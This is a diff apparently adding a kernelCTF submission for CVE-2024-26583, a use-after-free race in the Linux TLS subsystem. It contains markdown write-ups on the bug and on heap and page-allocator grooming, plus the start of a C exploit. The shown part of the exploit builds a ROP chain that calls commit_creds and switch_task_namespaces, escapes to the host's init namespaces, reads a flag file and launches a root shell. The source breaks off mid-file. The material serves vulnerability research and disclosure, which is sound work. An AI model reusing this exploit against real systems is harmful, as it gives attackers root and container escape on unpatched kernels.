diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/exploit.md new file mode 100644 index 000000000..d42006455 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/exploit.md @@ -0,0 +1,259 @@ +## Setup + +To trigger TLS encryption we must first configure the socket. +This is done using setsockopt() with the SOL_TLS option: + +``` + static struct tls12_crypto_info_aes_ccm_128 crypto_info; + crypto_info.info.version = TLS_1_2_VERSION; + crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128; + + if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); + +``` + +This syscall triggers the allocation of TLS context objects, which will be important later on during the exploitation phase. + +In the kernelCTF config PCRYPT (the parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (the software async crypto daemon). + +Each crypto operation needed for TLS is usually implemented by multiple drivers. +For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (a daemon that runs these basic synchronous crypto operations in parallel using an internal queue). + +Available drivers can be examined by looking at /proc/crypto; however, those are only the drivers of the currently loaded modules. The Crypto API supports loading additional modules on demand. + +As seen in the code snippet above, we don't have direct control over which crypto drivers are going to be used for our TLS encryption. +Drivers are selected automatically by the Crypto API based on the priority field, which is calculated internally to try to choose the "best" driver. + +By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations. + +However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. 
This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver. + +The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations. + +The following code causes the AES-CCM encryption selected for TLS to be handled by cryptd: + +``` + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", + .salg_name = "cryptd(ctr(aes-generic))" + }; + int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0); + + if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + struct sockaddr_alg sa2 = { + .salg_family = AF_ALG, + .salg_type = "aead", + .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))" + }; + + if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0) + err(1, "af_alg bind"); +``` + +## What we start with and what we can do + +If we win the race condition, the vulnerability gives us a limited write primitive. +To be exact, it gives us the ability to change an 8-bit integer value of '1' to '0' at offset 0x158 in the struct tls_sw_context_rx object, which is allocated from the general kmalloc-512 cache. + +The big problem is finding a victim object in which this limited write gives us the ability to escalate privileges or at least obtain a better exploitation primitive. + +## Victim object + +We had no success looking for kmalloc-512 objects, so we had to turn our attention to objects from other caches, even though that requires a cross-cache attack. + +The only object we were able to find is ipcomp_tfms: + +``` +struct ipcomp_tfms { + struct list_head list; /* 0 0x10 */ + struct crypto_comp * * tfms; /* 0x10 0x8 */ + int users; /* 0x18 0x4 */ + + /* size: 32, cachelines: 1, members: 3 */ +}; +``` + +This is used in the XFRM code. Changing the reference counter 'users' from 1 to 0 gives us a use-after-free. 
+ +Unfortunately, only one such object can be created for the whole system, so there is no way to spray a whole page with these objects. + +There are 128 possible positions for this object in a kmalloc-32 slab and 16 positions for the rx context in kmalloc-512. + +Only a few of these combinations align with the 0x158 offset, giving us a chance to perform the attack. + +``` +Target: 0x158 (base: 0x0) victim(ipcomp_tfms): 0x158 (base: 0x140) +Target: 0x358 (base: 0x200) victim(ipcomp_tfms): 0x358 (base: 0x340) +Target: 0x558 (base: 0x400) victim(ipcomp_tfms): 0x558 (base: 0x540) +Target: 0x758 (base: 0x600) victim(ipcomp_tfms): 0x758 (base: 0x740) +Target: 0x958 (base: 0x800) victim(ipcomp_tfms): 0x958 (base: 0x940) +Target: 0xb58 (base: 0xa00) victim(ipcomp_tfms): 0xb58 (base: 0xb40) +Target: 0xd58 (base: 0xc00) victim(ipcomp_tfms): 0xd58 (base: 0xd40) +Target: 0xf58 (base: 0xe00) victim(ipcomp_tfms): 0xf58 (base: 0xf40) +``` + +Another issue is that kmalloc-32 uses order-0 pages, while kmalloc-512 uses order-1 pages. + +This means we not only have to discard the slab page back to the page allocator, but also move it from the PCP to the buddy allocator and arrange the state of the allocator so that the order-1 page is returned for an order-0 request. + +All those issues combined resulted in a very unreliable exploit; however, it was reliable enough to eventually get the flag. + +## Triggering the use-after-free through the race condition + +``` + spin_lock_bh(&ctx->decrypt_compl_lock); + if (!atomic_dec_return(&ctx->decrypt_pending)) +[1] complete(&ctx->async_wait.completion); +[2] spin_unlock_bh(&ctx->decrypt_compl_lock); +} +``` + +To exploit the race condition we have to hit the window between points [1] and [2] and perform the following actions: +1. Close the socket to free the tls context (struct tls_sw_context_rx), leading to the discard of its slab page +2. Allocate the victim kmalloc-32 slab page in place of the tls context. 
+ +To hit this small window and extend it enough to fit our allocations, we turn to the well-known timerfd technique invented by Jann Horn. +The basic idea is to set an hrtimer-based timerfd to trigger a timer interrupt during our race window and attach a large number of epoll watches (as many as RLIMIT_NOFILE allows) to this timerfd, lengthening the time needed to handle the interrupt. +For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html). + +Exploitation is done in two threads: the main process runs on CPU 0, and a new thread (child_recv()) is cloned for each attempt and bound to CPU 1. + +| CPU 0 | CPU 1 | +| -------- | -------- | +| allocate tls context | - | +| - | exploit calls recv() triggering async crypto ops | +| - | tls_sw_recvmsg() waits on completion | +| - | cryptd calls tls_decrypt_done() | +| - | tls_decrypt_done() finishes the complete() call | +| - | timer interrupts tls_decrypt_done() | +| recv() returns to userspace unlocking the socket | timerfd code goes through all epoll notifications | +| exploit calls close() to free tls context | ... | +| exploit allocates the victim slab page in place of the tls context | ... | +| - | interrupt finishes and returns control to tls_decrypt_done() | +| - | spin_unlock_bh() writes to the reallocated memory | + + +## Ensuring the slab page is discarded + +struct tls_sw_context_rx is allocated from kmalloc-512. This cache uses a single order-1 page per slab, storing 16 objects. +To ensure the slab page is discarded we have to meet the same requirements as in a cross-cache attack: + +- all objects in the same slab as tls_sw_context_rx must be freed. 
All neighbouring objects are xattrs from the same kmalloc-512 cache and are freed before starting the race, which freezes the slab and puts it on the per-CPU partial list +- the per-CPU partial list must be full to unfreeze the slab after the tls context is freed +- the per-node partial list must also be full for the slab to be discarded instead of moved to the per-node list + +All these requirements are met before the tls context is freed, by freeing enough kmalloc-512 xattrs. + + +## Moving the order-1 page from the PCP to the buddy allocator + +If we free more pages than the 'high' limit of the given PCP list, a batch of pages will be released back to the buddy allocator: + +``` + if (pcp->count >= high) { + int batch = READ_ONCE(pcp->batch); + + free_pcppages_bulk(zone, nr_pcp_free(pcp, high, batch), pcp); + } +} +``` + +To be able to do this efficiently within the race condition window, we free pages exactly up to the limit, so that the discard of the slab page immediately triggers free_pcppages_bulk(). +The information we need about the current state of the PCP comes from [reading the zoneinfo file](../CVE-2024-26582_lts/docs/novel-techniques.md#predicting-how-much-we-have-to-allocate-free-to-trigger-pcp-flush). + +## Allocating an order-1 page + +As long as there are no order-0 pages available, the buddy allocator will split the order-1 page that was recently moved from the PCP and return part of it. + +We just have to allocate enough objects from an order-0 slab like kmalloc-256, but if we allocate too many, the buddy allocator will split some higher-order pages and the order-0 count might increase instead. + +Fortunately, we can parse the [buddyinfo](novel-techniques.md) file to get the zone counts we need. + +## Triggering the use-after-free after the 'users' field change + +At this point our 'users' field has been changed from 1 to 0 (this is stage2() in the exploit). + +This field is a reference counter, but it doesn't use the refcount_t type, so there are no protections against invalid values. 
+ +The code checking whether the object is still in use is very simple: +``` +static void ipcomp_free_tfms(struct crypto_comp * __percpu *tfms) +{ + struct ipcomp_tfms *pos; + int cpu; + + list_for_each_entry(pos, &ipcomp_tfms_list, list) { + if (pos->tfms == tfms) + break; + } + + WARN_ON(list_entry_is_head(pos, &ipcomp_tfms_list, list)); + +[1] if (--pos->users) + return; + + list_del(&pos->list); + kfree(pos); + + if (!tfms) + return; + + for_each_possible_cpu(cpu) { + struct crypto_comp *tfm = *per_cpu_ptr(tfms, cpu); + crypto_free_comp(tfm); + } + +} +``` + +If 'users' is equal to 1, the decrement at [1] brings it to 0 and the object is freed. + +Right now our counter is at 0, but we can just allocate another XFRM SA to increase this count to 1 and then perform the delete, freeing the object while it is still in use. + +## Getting RIP control + +When ipcomp_tfms is freed, all crypto context is freed as well, including struct crypto_alg which contains struct compress_alg: + +``` +struct compress_alg { + int (*coa_compress)(struct crypto_tfm *, const u8 *, unsigned int, u8 *, unsigned int *); /* 0 0x8 */ + int (*coa_decompress)(struct crypto_tfm *, const u8 *, unsigned int, u8 *, unsigned int *); /* 0x8 0x8 */ + + /* size: 16, cachelines: 1, members: 2 */ +}; +``` + + +These function pointers are called to compress/decompress network data on sockets configured with XFRM ipcomp. + +If we allocate our payload in place of this object, we can trigger code execution by calling sendmsg() on our XFRM socket. + +## Pivot to ROP + +At this point RSI contains a pointer to our data, so we only need 2 gadgets to pivot to ROP: +``` +push rsi +jmp qword ptr [rsi+0xf] +``` + +and + +``` +pop rsp +``` + +## Second pivot + +At this point we have full ROP and enough space available, but our standard privilege escalation payload relies on the ROP chain being at a known location, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second-stage ROP chain from userspace to that area. 
+Then we use a `pop rsp ; ret` gadget to pivot there. + +## Privilege escalation + +This time the execution is happening in the context of a syscall, so it is easy to escalate privileges with the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to a root shell. + diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/novel-techniques.md new file mode 100644 index 000000000..e1a0dcc69 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/novel-techniques.md @@ -0,0 +1,14 @@ +## Determining the state of the buddy allocator by parsing /proc/buddyinfo + +The Linux kernel exposes statistics about each memory zone in the world-readable /proc/buddyinfo. +For example: +``` +Node 0, zone DMA 0 0 0 0 0 0 0 1 +Node 0, zone DMA32 4 2 1 1 3 2 3 2 +Node 0, zone Normal 0 1 0 2 2 2 2 3 +``` + +Each column corresponds to an order: the DMA32 row, for example, shows 4 free order-0 pages, 2 free order-1 pages, and so on. + +This is very useful when the exploit needs to manipulate the buddy allocator to be able to get the target page even if it is not an exact match for the currently requested page (e.g. 
a different order). + diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/vulnerability.md new file mode 100644 index 000000000..0fb28fd57 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/vulnerability.md @@ -0,0 +1,49 @@ +## Requirements to trigger the vulnerability + +- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD] +- User namespaces required: no + +## Commit which introduced the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0cada33241d9de205522e3858b18e506ca5cce2c + +## Commit which fixed the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d + +## Affected kernel versions + +Introduced in 4.20. Fixed in 6.1.78, 5.15.159 and other stable trees. + +## Affected component, subsystem + +net/tls + +## Description + +TLS decryption works by calling recvmsg() on a TLS-configured socket. +This retrieves an encrypted message from the network stack and performs decryption. +AEAD decryption work is submitted to the crypto subsystem in tls_do_decryption(), which sets tls_decrypt_done() as a callback and calls crypto_aead_decrypt(). + +If decryption is done asynchronously, crypto_aead_decrypt() returns immediately with -EINPROGRESS instead of waiting. +Execution then returns to tls_sw_recvmsg(), which waits for the async crypto operations to finish using a completion mechanism. + +When decryption is finished, the crypto subsystem calls the tls_decrypt_done() callback, which calls complete(), allowing tls_sw_recvmsg() to exit. When recvmsg() returns, the socket is no longer locked and it is now possible to close it, which causes all associated objects to be freed. + +Relevant tls_decrypt_done() code: + +``` +... 
+ spin_lock_bh(&ctx->decrypt_compl_lock); + if (!atomic_dec_return(&ctx->decrypt_pending)) +[1] complete(&ctx->async_wait.completion); +[2] spin_unlock_bh(&ctx->decrypt_compl_lock); +} + +``` + +The bug is a race condition: calling complete() at [1] allows the socket to be closed, which causes the ctx object to be freed, but ctx is later used as an argument to spin_unlock_bh(). + +If an attacker manages to close the socket and reallocate the freed ctx with controlled data between points [1] and [2], they can manipulate memory using spin_unlock_bh(). + +This is a very limited write primitive, as it only allows changing an 8-bit integer value of 1 to 0 at a fixed position in memory (the spinlock is basically a 32-bit unsigned integer with the least significant byte used for the actual lock value). diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/Makefile b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/Makefile new file mode 100644 index 000000000..8752fd33f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/Makefile @@ -0,0 +1,9 @@ +INCLUDES = +LIBS = -pthread -ldl -lm +CFLAGS = -fomit-frame-pointer -static -fcf-protection=none + +exploit: exploit.c kernelver_17412.226.68.h + gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS) + +prerequisites: + sudo apt-get install libkeyutils-dev diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit new file mode 100755 index 000000000..557a3be04 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit.c b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit.c new file mode 100644 index 000000000..67263b1dd --- /dev/null +++ 
b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit.c @@ -0,0 +1,1747 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "kernelver_17412.226.68.h" + +#define INTERVAL1 25 + +static char *g_mmapped_buf; +static char *g_bigbuf; +static int g_sock_key; +static int g_sock_xfrm; +static uint64_t g_kernel_text; +static char g_leak_buf[0x10000]; +static int g_debug; +static int g_delay; +static int g_event1; +static int g_event2; +static unsigned int g_before2_cnt; + +#ifdef DEBUG +#define err(errcode, msg, ...) \ + do { \ + perror(msg); \ + sleep(1000); \ + } while (0) +#define errx(errcode, msg, ...) 
\ + do { \ + puts(msg); \ + sleep(1000); \ + } while (0) +#endif + +/* Netlink code based on syzcaller generated snippets */ +struct nlmsg { + char* pos; + int nesting; + struct nlattr* nested[8]; + char buf[0x30000]; +}; +static struct nlmsg nlmsg; + + +static void netlink_init(struct nlmsg* nlmsg, int typ, int flags, + const void* data, int size) +{ + memset(nlmsg, 0, sizeof(*nlmsg)); + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_type = typ; + hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags; + memcpy(hdr + 1, data, size); + nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size); +} + +static void netlink_attr(struct nlmsg* nlmsg, int typ, const void* data, + int size) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + + attr->nla_len = sizeof(*attr) + size; + + if (nlmsg->pos - nlmsg->buf + attr->nla_len > sizeof(nlmsg->buf)) + errx(1, "Netlink buffer overflow, increase size in struct nlmsg\n"); + + attr->nla_type = typ; + if (size > 0) + memcpy(attr + 1, data, size); + nlmsg->pos += NLMSG_ALIGN(attr->nla_len); +} + +static void netlink_nest(struct nlmsg* nlmsg, int typ) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + attr->nla_type = typ | NLA_F_NESTED; + nlmsg->pos += sizeof(*attr); + nlmsg->nested[nlmsg->nesting++] = attr; +} + +static void netlink_done(struct nlmsg* nlmsg) +{ + struct nlattr* attr = nlmsg->nested[--nlmsg->nesting]; + + if (nlmsg->pos - (char *) attr > 0xffff) + errx(1, "Netlink attribute max size exceeded\n"); + + attr->nla_len = nlmsg->pos - (char*)attr; +} + +static int netlink_send_ext(struct nlmsg* nlmsg, int sock, uint16_t reply_type, + int* reply_len, bool dofail) +{ + if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting) + err(1, "netlink_send_ext error"); + + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_len = nlmsg->pos - nlmsg->buf; + + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + + ssize_t n = sendto(sock, 
nlmsg->buf, hdr->nlmsg_len, 0, + (struct sockaddr*)&addr, sizeof(addr)); + + if (n != (ssize_t)hdr->nlmsg_len) { + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + + n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0); + if (reply_len) + *reply_len = 0; + + if (n < 0) { + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + if (n < (ssize_t)sizeof(struct nlmsghdr)) { + errno = EINVAL; + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + if (hdr->nlmsg_type == NLMSG_DONE) + return 0; + + if (reply_len && hdr->nlmsg_type == reply_type) { + *reply_len = n; + return 0; + } + if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) { + errno = EINVAL; + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + if (hdr->nlmsg_type != NLMSG_ERROR) { + errno = EINVAL; + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + + errno = -((struct nlmsgerr*)(hdr + 1))->error; + return -errno; +} + +static int netlink_send(struct nlmsg* nlmsg, int sock) +{ + return netlink_send_ext(nlmsg, sock, 0, NULL, false); +} + +/* End of syzkaller code */ + +static void netlink_device_change(struct nlmsg* nlmsg, int sock, + const char* name, bool up, const char* master, + const void* mac, int macsize, + const char* new_name) +{ + struct ifinfomsg hdr; + memset(&hdr, 0, sizeof(hdr)); + + if (up) + hdr.ifi_flags = hdr.ifi_change = IFF_UP; + + hdr.ifi_index = if_nametoindex(name); + + netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr)); + + if (new_name) + netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name)); + + if (master) { + int ifindex = if_nametoindex(master); + netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex)); + } + + netlink_send(nlmsg, sock); +} + +static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev, + const void* addr, int addrsize) +{ + struct ifaddrmsg hdr; + memset(&hdr, 0, sizeof(hdr)); + hdr.ifa_family = addrsize == 4 ? 
AF_INET : AF_INET6; + hdr.ifa_prefixlen = addrsize == 4 ? 24 : 64; + hdr.ifa_scope = RT_SCOPE_UNIVERSE; + hdr.ifa_index = if_nametoindex(dev); + netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, + sizeof(hdr)); + netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize); + netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize); +uint32_t flags = IFA_F_NODAD; + netlink_attr(nlmsg, IFA_FLAGS, &flags, sizeof(flags)); + return netlink_send(nlmsg, sock); +} + +static int netlink_del_addr(struct nlmsg* nlmsg, int sock, const char* dev, + const void* addr, int addrsize, int prefix_size) +{ + struct ifaddrmsg hdr; + memset(&hdr, 0, sizeof(hdr)); + hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6; + hdr.ifa_prefixlen = prefix_size; + hdr.ifa_scope = RT_SCOPE_UNIVERSE; + hdr.ifa_index = if_nametoindex(dev); + netlink_init(nlmsg, RTM_DELADDR, 0, &hdr, + sizeof(hdr)); + netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize); + return netlink_send(nlmsg, sock); +} + +static void netlink_add_addr4(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in_addr in_addr; + inet_pton(AF_INET, addr, &in_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr)); + if (err < 0) { + } +} + +static void netlink_add_addr6(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in6_addr in6_addr; + inet_pton(AF_INET6, addr, &in6_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr)); + if (err < 0) { + } +} + +static void setup_network(char *link_name) +{ + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock == -1) + exit(1); + + netlink_device_change(&nlmsg, sock, "lo", true, 0, NULL, 0, link_name); + + netlink_add_addr6(&nlmsg, sock, "lo", "2001:0db8:0:f101::1/64"); + struct in6_addr in6; + memset(&in6, 0, sizeof(in6)); + *(((char *) (&in6)) + 15) = 1; + + netlink_del_addr(&nlmsg, sock, "lo", &in6, sizeof(in6), 128); + + close(sock); + +} + + + +void set_cpu(int cpu) +{ + 
cpu_set_t cpus; + CPU_ZERO(&cpus); + CPU_SET(cpu, &cpus); + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void set_cpu_all() +{ + cpu_set_t cpus; + CPU_ZERO(&cpus); + for (int i = 0; i < 4; i++) + { + CPU_SET(i, &cpus); + } + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void get_kctf_flag() +{ + char buf[512]; + + + int fd = open("/flag", O_RDONLY); + + if (fd < 0) + return; + + size_t n = read(fd, buf, sizeof(buf)); + if (n > 0) { + printf("Flag:\n"); + + write(1, buf, n); + + printf("\n"); + } + + close(fd); +} + +static char *g_sh_argv[] = {"sh", NULL}; + +static int g_status; + +#define MMAP_SIZE 0x8000 + +static int g_pwned; +static char *g_rop2; +static size_t g_rop2_len; + +#define ROP2_CONST_AREA 0x10 +#define ROP2_CONST_OFFSET 0x200 + +uint64_t kaddr(uint64_t addr) +{ + return g_kernel_text + addr - 0xffffffff81000000uL; +} + + +void __attribute__((naked)) after_pwn() +{ +// Fix user stack and recover eflags since we didn't do when returning from kernel mode + asm volatile( + "mov %0, %%rsp\n" + :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100) + ); + + g_pwned = 1; + + + set_cpu(1); + + int pid = fork(); + + if (!pid) { + + if (setns(open("/proc/1/ns/mnt", O_RDONLY), 0) < 0) + perror("setns"); + + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + printf("\nGot root!!!\n"); + printf("Getting kctf flags ...\n"); + + get_kctf_flag(); + + printf("Launching shell, system will crash when you exit because I didn't bother with recovery ...\n"); + execve("/bin/sh", g_sh_argv, NULL); + _exit(0); + } + + waitpid(pid, &g_status, 0); + + + + printf("Shell exited, sleeping for 30 seconds, after that system might crash\n"); + + sleep(30); + _exit(0); +} + +int setup_namespaces() +{ + char *uid_map; + char *gid_map; + int ret, map; + uid_t uid = getuid(); + uid_t gid = getgid(); + + if 
(unshare(CLONE_NEWUSER|CLONE_NEWNS|CLONE_NEWNET)) { + perror("unshare"); + exit(1); + } + + map = open("/proc/self/setgroups", O_WRONLY); + ret = write(map, "deny", 4); + + if (ret < 4) { + perror("setgroups write"); + exit(1); + } + + close(map); + + asprintf(&uid_map, "0 %d 1\n", uid); + size_t len = strlen(uid_map); + + map = open("/proc/self/uid_map", O_WRONLY); + + ret = write(map, uid_map, len); + + if (ret < (int) len) { + perror("uid map write"); + exit(1); + } + close(map); + + asprintf(&gid_map, "0 %d 1\n", gid); + map = open("/proc/self/gid_map", O_WRONLY); + ret = write(map, gid_map, len); + + if (ret < (int) len) { + perror("gid map write"); + exit(1); + } + + close(map); + + if (mount("tmpfs", "/tmp", "tmpfs", 0, NULL)) { + perror("mount"); + exit(1); + } +} + +void rop_rax2rdi(uint64_t **rop_p) +{ + uint64_t *rop = *rop_p; + + *(uint64_t *) (g_rop2+ROP2_CONST_OFFSET) = kaddr(POP_RDI); // RCX == RW_BUFFER + +// rax -> rdi + *rop++ = kaddr(POP_RCX); + *rop++ = kaddr(RW_BUFFER+ROP2_CONST_OFFSET); + *rop++ = kaddr(PUSH_RAX_JMP_QWORD_RCX); + + *rop_p = rop; +} + +size_t prepare_rop2(uint64_t *rop2) +{ + uint64_t *rop2_start = rop2; + + + *rop2++ = kaddr(POP_RDI); + *rop2++ = kaddr(INIT_CRED); + *rop2++ = kaddr(COMMIT_CREDS); + *rop2++ = kaddr(AUDIT_SYSCALL_EXIT); + + // Namespace escape based on code by Crusaders of Rust + *rop2++ = kaddr(POP_RDI); + *rop2++ = 1; + *rop2++ = kaddr(FIND_TASK_BY_VPID); + + *rop2++ = kaddr(POP_RSI_RDI); + *rop2++ = kaddr(INIT_NSPROXY); + *rop2++ = 0xdeadaaaa; + + rop_rax2rdi(&rop2); // clobbers RCX + + + *rop2++ = kaddr(SWITCH_TASK_NAMESPACES); + + *rop2++ = kaddr(POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX); +// eflags + *rop2++ = 0; + rop2 += 6; + +// Userspace RIP + *rop2++ = (uint64_t) after_pwn; + + *rop2++ = kaddr(RETURN_VIA_SYSRET); + + return (char *) rop2 - (char *) rop2_start; +} + +void prepare_rop(char *buf) +{ + uint64_t *rop = (uint64_t *) buf; + + *(uint64_t *) (buf + 0xf) = kaddr(POP_RSP); + + +// pop 2 + *rop++ = 
kaddr(POP_RSI_RDI); + rop += 2; + + *rop++ = kaddr(POP_RDI_RSI_RDX_RCX); + + *rop++ = kaddr(RW_BUFFER); + *rop++ = (uint64_t) g_rop2; + *rop++ = ROP2_CONST_OFFSET + ROP2_CONST_AREA; + *rop++ = 0; + + *rop++ = kaddr(COPY_USER_GENERIC_STRING); + + *rop++ = kaddr(POP_RSP); + *rop++ = kaddr(RW_BUFFER); + + if (((char *) rop - buf) > 0xe0) + errx(1, "Stage 1 ROP too long (%d bytes)", (char *) rop - buf); + +} + +int alloc_xattr_fd_attr(int fd, char *attr, size_t size, void *buf) +{ + int res = fsetxattr(fd, attr, buf, size - 32, XATTR_CREATE); + if (res < 0) { + err(1, "fsetxattr"); + } + + return fd; +} + +int alloc_xattr_fd(int fd, unsigned int id, size_t size, void *buf) +{ + char *attr; + + asprintf(&attr, "security.%d", id); + alloc_xattr_fd_attr(fd, attr, size, buf); + + return fd; +} + +int alloc_xattr_fd2(int fd, unsigned int id, size_t name_size, size_t size, void *buf) +{ + char attr_buf[1024]; + + memset(attr_buf, 0, sizeof(attr_buf)); + strcpy(attr_buf, "security."); + + name_size -= strlen(attr_buf) + 5; + + memset(attr_buf + 9, 'a', name_size); + + sprintf(attr_buf + 9 + name_size, "%04d", id); + alloc_xattr_fd_attr(fd, attr_buf, size, buf); + + return fd; +} + +void free_xattr_fd(int fd, int id) +{ + char *attr; + + asprintf(&attr, "security.%d", id); + + fremovexattr(fd, attr); +} + + +ssize_t read_xattr_fd(int fd, int id, char *buf, size_t sz) +{ + char *attr; + + asprintf(&attr, "security.%d", id); + + ssize_t ret = fgetxattr(fd, attr, buf, sz); + + if (ret < 0) + err(1, "read_xattr_fd"); + + return ret; +} + +int alloc_xattr(unsigned int id, size_t size, void *buf) +{ + int fd; + char *fname; + + asprintf(&fname, "/tmp/xattr%d", id); + fd = open(fname, O_RDWR|O_CREAT); + if (fd < 0) + err(1, "open xattr"); + + alloc_xattr_fd_attr(fd, "security.attr", size, buf); + + return fd; +} + + +void allocate_twsock_slab() +{ + int listen_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (listen_sock < 0) + err(1, "socket"); + + struct sockaddr_in addr, 
client_addr; + socklen_t client_addr_sz; + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(6666); + + if (bind(listen_sock, &addr, sizeof(addr)) < 0) + err(1, "bind"); + + if (listen(listen_sock, 99) < 0) + err(1, "listen"); + + int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (sock < 0) + err(1, "socket"); + + if (connect(sock, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + close(sock); +} + +#define DUP_CNT 1300 +#define EPOLL_CNT 590 + +int epoll_fds[EPOLL_CNT]; +int tfd_dups[DUP_CNT]; +static int event1; + +#define MAX_ATTEMPTS 100 +#define MAX_ATTEMPTS2 20 +#define SLAB_CNT 16 +#define KMALLOC32_SLAB_CNT 128 +#define KMALLOC32_CNT KMALLOC32_SLAB_CNT*20 +#define DENTRY_SLAB_CNT 21 +#define INODE_SLAB_CNT 13 +#define PARTIAL1_CNT SLAB_CNT*14 +#define NEIGH_CNT SLAB_CNT-2 +#define BEFORE3_CNT SLAB_CNT-2 +#define PCPFLUSH_CNT 256 +#define PCPFLUSH2_CNT 1500 +#define AFTER_CNT SLAB_CNT*2 +#define NETLINK_CNT 200 +#define ORDER0_CNT SLAB_CNT*30 +#define ORDER1_CNT SLAB_CNT*500 +#define MSG_CNT 256*80 + +enum 